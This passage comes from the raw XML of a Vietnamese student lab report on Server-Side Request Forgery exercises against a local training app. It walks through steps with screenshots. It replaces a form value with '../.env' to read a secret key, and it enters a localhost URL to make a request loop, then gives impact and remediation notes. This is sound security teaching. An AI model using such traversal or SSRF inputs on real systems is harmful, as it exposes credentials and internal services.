      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="005D293D">
        <w:t xml:space="preserve"> Thực hiện thay đổi trường thông tin của một button (ví dụ: từ blog1 thành blog2) và xem kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041110C7" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00400227">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F83AB9" wp14:editId="5AF1C4BD">
            <wp:extent cx="6115050" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="582527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27076" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2038350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD4F1A" w14:textId="23C2F658" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="0065424E" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t>Sau đó, nhấn</w:t>
      </w:r>
      <w:r w:rsidR="001027BE" w:rsidRPr="001027BE">
        <w:t xml:space="preserve"> enter</w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t xml:space="preserve"> thì thấy thông tin của Blog2 hiển thị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029063C1" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00400227">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0815787B" wp14:editId="3ABBB6CA">
            <wp:extent cx="6115050" cy="1513840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1733492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92149" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1513840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F8547" w14:textId="2AD96F62" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="001027BE" w:rsidP="0065424E">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00C14D82">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:t>iểm tra code thì thấy được viết bằng Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8EE68" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00C14D82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E602E63" wp14:editId="5AE05EFC">
            <wp:extent cx="6115050" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2033707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07351" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1722755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9ECEB1" w14:textId="7292D133" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r>
        <w:t>Đến đây, thực hiện thay đổi giá trị value như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196C3E03" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r>
        <w:t>Từ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6893A72B" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="00C14D82" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00C14D82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA8CD46" wp14:editId="22D7ED91">
            <wp:extent cx="5835950" cy="3073558"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1398854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54579" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5835950" cy="3073558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="038111AA" w14:textId="212CA174" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="0065424E" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t xml:space="preserve">Thay đổi thành: </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>value=</w:t>
      </w:r>
      <w:r w:rsidR="001027BE" w:rsidRPr="001027BE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>urls.py”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F4F99" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00C14D82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50C1A652" wp14:editId="30167F0B">
            <wp:extent cx="5810549" cy="2768742"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1427571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71369" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5810549" cy="2768742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED53D5" w14:textId="50E5360E" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="001027BE" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:t>hấy kết quả được trả về như sau, cho phép truy cập vào nội dung của file đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B5F583" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C14D82">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A148802" wp14:editId="30B2ABB7">
            <wp:extent cx="6115050" cy="2800350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="607930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30487" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2800350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9861FA" w14:textId="6F348C74" w:rsidR="0065424E" w:rsidRDefault="001027BE" w:rsidP="0065424E">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FF3A98">
        <w:t xml:space="preserve"> Sử dụng gợi ý từ yêu cầu đề bài, tìm kiếm file </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FF3A98">
        <w:t xml:space="preserve">. Theo quy trình clean code, </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="001027BE">
        <w:t>file .env thường được đặt ở phía trước các thư mục chứa code Python. Vì vậy, có thể thử</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FF3A98">
        <w:t xml:space="preserve"> truy cập bằng đường dẫn </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FF3A98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>../.env</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FF3A98">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F3A748" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="0065424E" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5172500A" wp14:editId="29757131">
            <wp:extent cx="6115050" cy="1977390"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="584174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74997" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1977390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65657D4D" w14:textId="5EAF5D1B" w:rsidR="0065424E" w:rsidRPr="001027BE" w:rsidRDefault="0065424E" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t xml:space="preserve">Kết quả được trả về, </w:t>
      </w:r>
      <w:r w:rsidR="001027BE" w:rsidRPr="001027BE">
        <w:t xml:space="preserve">lúc này </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t>đã thấy được Secret Key và thực hiện thử thách thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BAECA" w14:textId="180B4575" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19842B50" wp14:editId="7E7E4C9D">
            <wp:extent cx="6115050" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1660261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61641" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2794000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3D6F36" w14:textId="7D823C8D" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="0065424E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>High (cao)</w:t>
      </w:r>
      <w:r w:rsidR="001027BE">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>ì kẻ tấn công có thể thực hiện kiểm tra và thay đổi đường truy cập vào code, tiềm ẩn nguy cơ xâm nhập vào hệ thống và thu thập thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260139F" w14:textId="0859DE25" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>Cần thực hiện việc filter các button khi thực hiện code chương trình thay vì tự động thực hiện, giúp ngăn chặn kẻ tấn công khai thác lỗ hổng SSRF này thông qua các thao tác tương tác trên trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FDFF16" w14:textId="75A85259" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc182909876"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="09E7AF53" w14:textId="10244A99" w:rsidR="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/ssrf_lab2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39D7B243" w14:textId="3F5D5312" w:rsidR="007C62EC" w:rsidRPr="009D0400" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C62EC">
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF) </w:t>
      </w:r>
      <w:r w:rsidR="001035B9">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="007C62EC">
        <w:t>Lab 2</w:t>
      </w:r>
      <w:r w:rsidR="001035B9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCD6333" w14:textId="2C552703" w:rsidR="007C62EC" w:rsidRPr="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t>Trong lab này, tồn tại lỗ hổng SSRF (Server-Side Request Forgery), cho phép kẻ tấn công thực hiện các yêu cầu từ máy chủ mà không cần sự cho phép, bằng cách thực hiện nhập URL và tạo một vòng lặp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1563833B" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C66E90" w14:textId="61BF2926" w:rsidR="007C62EC" w:rsidRDefault="001027BE" w:rsidP="007C62EC">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="007C62EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:t>ruy cập vào lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C674D" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00965CE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CB2E312" wp14:editId="25BE27A5">
            <wp:extent cx="6115050" cy="1083945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1486863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63153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1083945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163B869" w14:textId="301AC03A" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00CE5F83">
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r w:rsidR="001027BE">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5F83">
        <w:t xml:space="preserve">truy cập vào trang web và thực hiện nhập URL của một trang web bất kỳ, ví dụ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00CE5F83">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://uit.edu.vn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CE5F83">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A659E8" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00CE5F83">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B03B365" wp14:editId="2805E3FD">
            <wp:extent cx="6115050" cy="2872105"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2005931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31914" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2872105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3D0E1" w14:textId="52F0C728" w:rsidR="007C62EC" w:rsidRDefault="001027BE" w:rsidP="007C62EC">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="001027BE">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:t>iểm tra code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52011909" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00CE5F83">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05082087" wp14:editId="23D496B0">
            <wp:extent cx="6115050" cy="3102610"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="625817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17768" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3102610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A4B2F" w14:textId="3316596F" w:rsidR="007C62EC" w:rsidRPr="001027BE" w:rsidRDefault="001027BE" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:t>hấy rằng đầu vào không được lọc. Vì vậy, ý tưởng tiếp theo là sẽ truyền thông tin độc hại vào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493068A" w14:textId="56DF9C09" w:rsidR="007C62EC" w:rsidRPr="00CC4E52" w:rsidRDefault="001027BE" w:rsidP="007C62EC">
      <w:r w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="001027BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="007C62EC" w:rsidRPr="00CC4E52">
        <w:t xml:space="preserve"> Thực hiện tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776ECC5F" w14:textId="77777777" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00CE5F83">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DA5A7E5" wp14:editId="4726BA62">
            <wp:extent cx="6115050" cy="1330960"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1685853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53399" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1330960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A35C75" w14:textId="7E8D7A63" w:rsidR="007C62EC" w:rsidRPr="001027BE" w:rsidRDefault="007C62EC" w:rsidP="001027BE">
      <w:r w:rsidRPr="001027BE">
        <w:t xml:space="preserve">Từ gợi ý yêu cầu, nhập </w:t>
      </w:r>
      <w:hyperlink r:id="rId125" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="001027BE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8000/ssrf_target</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001027BE">
        <w:t xml:space="preserve"> (thông tin độc hại liên quan đến trang web của mình) để tạo thành một vòng lặp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EEFC3" w14:textId="201A1E90" w:rsidR="007C62EC" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r>
        <w:t>Kết quả</w:t>
      </w:r>
      <w:r w:rsidR="001027BE">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r>
        <w:t>thực hiện thử thách thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE30E6" w14:textId="16B774F9" w:rsidR="007C62EC" w:rsidRPr="009D0400" w:rsidRDefault="007C62EC" w:rsidP="007C62EC">
      <w:r w:rsidRPr="00CE5F83">
